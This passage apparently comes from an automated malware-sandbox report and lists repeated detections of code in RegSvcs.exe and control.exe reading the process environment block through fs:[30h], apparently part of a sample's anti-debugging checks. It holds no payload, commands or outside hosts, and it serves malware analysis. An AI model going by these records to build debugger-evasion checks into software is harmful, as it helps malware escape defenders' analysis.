Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7BC2C mov eax, dword ptr fs:[00000030h]	5_2_00A7BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6C0A mov eax, dword ptr fs:[00000030h]	5_2_00AC6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6C0A mov eax, dword ptr fs:[00000030h]	5_2_00AC6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6C0A mov eax, dword ptr fs:[00000030h]	5_2_00AC6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6C0A mov eax, dword ptr fs:[00000030h]	5_2_00AC6C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01C06 mov eax, dword ptr fs:[00000030h]	5_2_00B01C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B1740D mov eax, dword ptr fs:[00000030h]	5_2_00B1740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B1740D mov eax, dword ptr fs:[00000030h]	5_2_00B1740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B1740D mov eax, dword ptr fs:[00000030h]	5_2_00B1740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6746D mov eax, dword ptr fs:[00000030h]	5_2_00A6746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7A44B mov eax, dword ptr fs:[00000030h]	5_2_00A7A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADC450 mov eax, dword ptr fs:[00000030h]	5_2_00ADC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADC450 mov eax, dword ptr fs:[00000030h]	5_2_00ADC450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A735A1 mov eax, dword ptr fs:[00000030h]	5_2_00A735A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A71DB5 mov eax, dword ptr fs:[00000030h]	5_2_00A71DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A71DB5 mov eax, dword ptr fs:[00000030h]	5_2_00A71DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A71DB5 mov eax, dword ptr fs:[00000030h]	5_2_00A71DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B105AC mov eax, dword ptr fs:[00000030h]	5_2_00B105AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B105AC mov eax, dword ptr fs:[00000030h]	5_2_00B105AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A72581 mov eax, dword ptr fs:[00000030h]	5_2_00A72581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A72581 mov eax, dword ptr fs:[00000030h]	5_2_00A72581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A72581 mov eax, dword ptr fs:[00000030h]	5_2_00A72581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A72581 mov eax, dword ptr fs:[00000030h]	5_2_00A72581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A42D8A mov eax, dword ptr fs:[00000030h]	5_2_00A42D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A42D8A mov eax, dword ptr fs:[00000030h]	5_2_00A42D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A42D8A mov eax, dword ptr fs:[00000030h]	5_2_00A42D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A42D8A mov eax, dword ptr fs:[00000030h]	5_2_00A42D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A42D8A mov eax, dword ptr fs:[00000030h]	5_2_00A42D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7FD9B mov eax, dword ptr fs:[00000030h]	5_2_00A7FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7FD9B mov eax, dword ptr fs:[00000030h]	5_2_00A7FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5D5E0 mov eax, dword ptr fs:[00000030h]	5_2_00A5D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5D5E0 mov eax, dword ptr fs:[00000030h]	5_2_00A5D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0FDE2 mov eax, dword ptr fs:[00000030h]	5_2_00B0FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0FDE2 mov eax, dword ptr fs:[00000030h]	5_2_00B0FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0FDE2 mov eax, dword ptr fs:[00000030h]	5_2_00B0FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0FDE2 mov eax, dword ptr fs:[00000030h]	5_2_00B0FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AF8DF1 mov eax, dword ptr fs:[00000030h]	5_2_00AF8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_00AC6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_00AC6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_00AC6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6DC9 mov ecx, dword ptr fs:[00000030h]	5_2_00AC6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_00AC6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6DC9 mov eax, dword ptr fs:[00000030h]	5_2_00AC6DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B18D34 mov eax, dword ptr fs:[00000030h]	5_2_00B18D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0E539 mov eax, dword ptr fs:[00000030h]	5_2_00B0E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A53D34 mov eax, dword ptr fs:[00000030h]	5_2_00A53D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4AD30 mov eax, dword ptr fs:[00000030h]	5_2_00A4AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ACA537 mov eax, dword ptr fs:[00000030h]	5_2_00ACA537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A74D3B mov eax, dword ptr fs:[00000030h]	5_2_00A74D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A74D3B mov eax, dword ptr fs:[00000030h]	5_2_00A74D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A74D3B mov eax, dword ptr fs:[00000030h]	5_2_00A74D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6C577 mov eax, dword ptr fs:[00000030h]	5_2_00A6C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6C577 mov eax, dword ptr fs:[00000030h]	5_2_00A6C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A83D43 mov eax, dword ptr fs:[00000030h]	5_2_00A83D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC3540 mov eax, dword ptr fs:[00000030h]	5_2_00AC3540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A67D50 mov eax, dword ptr fs:[00000030h]	5_2_00A67D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC46A7 mov eax, dword ptr fs:[00000030h]	5_2_00AC46A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B10EA5 mov eax, dword ptr fs:[00000030h]	5_2_00B10EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B10EA5 mov eax, dword ptr fs:[00000030h]	5_2_00B10EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B10EA5 mov eax, dword ptr fs:[00000030h]	5_2_00B10EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADFE87 mov eax, dword ptr fs:[00000030h]	5_2_00ADFE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A716E0 mov ecx, dword ptr fs:[00000030h]	5_2_00A716E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A576E2 mov eax, dword ptr fs:[00000030h]	5_2_00A576E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B18ED6 mov eax, dword ptr fs:[00000030h]	5_2_00B18ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A736CC mov eax, dword ptr fs:[00000030h]	5_2_00A736CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AFFEC0 mov eax, dword ptr fs:[00000030h]	5_2_00AFFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A88EC7 mov eax, dword ptr fs:[00000030h]	5_2_00A88EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4E620 mov eax, dword ptr fs:[00000030h]	5_2_00A4E620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AFFE3F mov eax, dword ptr fs:[00000030h]	5_2_00AFFE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4C600 mov eax, dword ptr fs:[00000030h]	5_2_00A4C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4C600 mov eax, dword ptr fs:[00000030h]	5_2_00A4C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4C600 mov eax, dword ptr fs:[00000030h]	5_2_00A4C600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A78E00 mov eax, dword ptr fs:[00000030h]	5_2_00A78E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B01608 mov eax, dword ptr fs:[00000030h]	5_2_00B01608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7A61C mov eax, dword ptr fs:[00000030h]	5_2_00A7A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7A61C mov eax, dword ptr fs:[00000030h]	5_2_00A7A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5766D mov eax, dword ptr fs:[00000030h]	5_2_00A5766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_00A6AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_00A6AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_00A6AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_00A6AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6AE73 mov eax, dword ptr fs:[00000030h]	5_2_00A6AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A57E41 mov eax, dword ptr fs:[00000030h]	5_2_00A57E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A57E41 mov eax, dword ptr fs:[00000030h]	5_2_00A57E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A57E41 mov eax, dword ptr fs:[00000030h]	5_2_00A57E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A57E41 mov eax, dword ptr fs:[00000030h]	5_2_00A57E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A57E41 mov eax, dword ptr fs:[00000030h]	5_2_00A57E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A57E41 mov eax, dword ptr fs:[00000030h]	5_2_00A57E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0AE44 mov eax, dword ptr fs:[00000030h]	5_2_00B0AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0AE44 mov eax, dword ptr fs:[00000030h]	5_2_00B0AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A58794 mov eax, dword ptr fs:[00000030h]	5_2_00A58794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC7794 mov eax, dword ptr fs:[00000030h]	5_2_00AC7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC7794 mov eax, dword ptr fs:[00000030h]	5_2_00AC7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC7794 mov eax, dword ptr fs:[00000030h]	5_2_00AC7794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A837F5 mov eax, dword ptr fs:[00000030h]	5_2_00A837F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A44F2E mov eax, dword ptr fs:[00000030h]	5_2_00A44F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A44F2E mov eax, dword ptr fs:[00000030h]	5_2_00A44F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7E730 mov eax, dword ptr fs:[00000030h]	5_2_00A7E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7A70E mov eax, dword ptr fs:[00000030h]	5_2_00A7A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7A70E mov eax, dword ptr fs:[00000030h]	5_2_00A7A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6F716 mov eax, dword ptr fs:[00000030h]	5_2_00A6F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B1070D mov eax, dword ptr fs:[00000030h]	5_2_00B1070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B1070D mov eax, dword ptr fs:[00000030h]	5_2_00B1070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADFF10 mov eax, dword ptr fs:[00000030h]	5_2_00ADFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADFF10 mov eax, dword ptr fs:[00000030h]	5_2_00ADFF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5FF60 mov eax, dword ptr fs:[00000030h]	5_2_00A5FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B18F6A mov eax, dword ptr fs:[00000030h]	5_2_00B18F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5EF40 mov eax, dword ptr fs:[00000030h]	5_2_00A5EF40
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F214FB mov eax, dword ptr fs:[00000030h]	11_2_04F214FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E658EC mov eax, dword ptr fs:[00000030h]	11_2_04E658EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6CF0 mov eax, dword ptr fs:[00000030h]	11_2_04EE6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6CF0 mov eax, dword ptr fs:[00000030h]	11_2_04EE6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6CF0 mov eax, dword ptr fs:[00000030h]	11_2_04EE6CF0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F38CD6 mov eax, dword ptr fs:[00000030h]	11_2_04F38CD6
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EFB8D0 mov eax, dword ptr fs:[00000030h]	11_2_04EFB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EFB8D0 mov ecx, dword ptr fs:[00000030h]	11_2_04EFB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EFB8D0 mov eax, dword ptr fs:[00000030h]	11_2_04EFB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EFB8D0 mov eax, dword ptr fs:[00000030h]	11_2_04EFB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EFB8D0 mov eax, dword ptr fs:[00000030h]	11_2_04EFB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EFB8D0 mov eax, dword ptr fs:[00000030h]	11_2_04EFB8D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EA90AF mov eax, dword ptr fs:[00000030h]	11_2_04EA90AF
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E920A0 mov eax, dword ptr fs:[00000030h]	11_2_04E920A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E920A0 mov eax, dword ptr fs:[00000030h]	11_2_04E920A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E920A0 mov eax, dword ptr fs:[00000030h]	11_2_04E920A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E920A0 mov eax, dword ptr fs:[00000030h]	11_2_04E920A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E920A0 mov eax, dword ptr fs:[00000030h]	11_2_04E920A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E920A0 mov eax, dword ptr fs:[00000030h]	11_2_04E920A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9F0BF mov ecx, dword ptr fs:[00000030h]	11_2_04E9F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9F0BF mov eax, dword ptr fs:[00000030h]	11_2_04E9F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9F0BF mov eax, dword ptr fs:[00000030h]	11_2_04E9F0BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E69080 mov eax, dword ptr fs:[00000030h]	11_2_04E69080
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE3884 mov eax, dword ptr fs:[00000030h]	11_2_04EE3884
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE3884 mov eax, dword ptr fs:[00000030h]	11_2_04EE3884
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7849B mov eax, dword ptr fs:[00000030h]	11_2_04E7849B
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F22073 mov eax, dword ptr fs:[00000030h]	11_2_04F22073
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E8746D mov eax, dword ptr fs:[00000030h]	11_2_04E8746D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F31074 mov eax, dword ptr fs:[00000030h]	11_2_04F31074
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9A44B mov eax, dword ptr fs:[00000030h]	11_2_04E9A44B
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E80050 mov eax, dword ptr fs:[00000030h]	11_2_04E80050
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E80050 mov eax, dword ptr fs:[00000030h]	11_2_04E80050
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EFC450 mov eax, dword ptr fs:[00000030h]	11_2_04EFC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EFC450 mov eax, dword ptr fs:[00000030h]	11_2_04EFC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9002D mov eax, dword ptr fs:[00000030h]	11_2_04E9002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9002D mov eax, dword ptr fs:[00000030h]	11_2_04E9002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9002D mov eax, dword ptr fs:[00000030h]	11_2_04E9002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9002D mov eax, dword ptr fs:[00000030h]	11_2_04E9002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9002D mov eax, dword ptr fs:[00000030h]	11_2_04E9002D
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E9BC2C mov eax, dword ptr fs:[00000030h]	11_2_04E9BC2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7B02A mov eax, dword ptr fs:[00000030h]	11_2_04E7B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7B02A mov eax, dword ptr fs:[00000030h]	11_2_04E7B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7B02A mov eax, dword ptr fs:[00000030h]	11_2_04E7B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04E7B02A mov eax, dword ptr fs:[00000030h]	11_2_04E7B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6C0A mov eax, dword ptr fs:[00000030h]	11_2_04EE6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6C0A mov eax, dword ptr fs:[00000030h]	11_2_04EE6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6C0A mov eax, dword ptr fs:[00000030h]	11_2_04EE6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04EE6C0A mov eax, dword ptr fs:[00000030h]	11_2_04EE6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F34015 mov eax, dword ptr fs:[00000030h]	11_2_04F34015
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_04F34015 mov eax, dword ptr fs:[00000030h]	11_2_04F34015
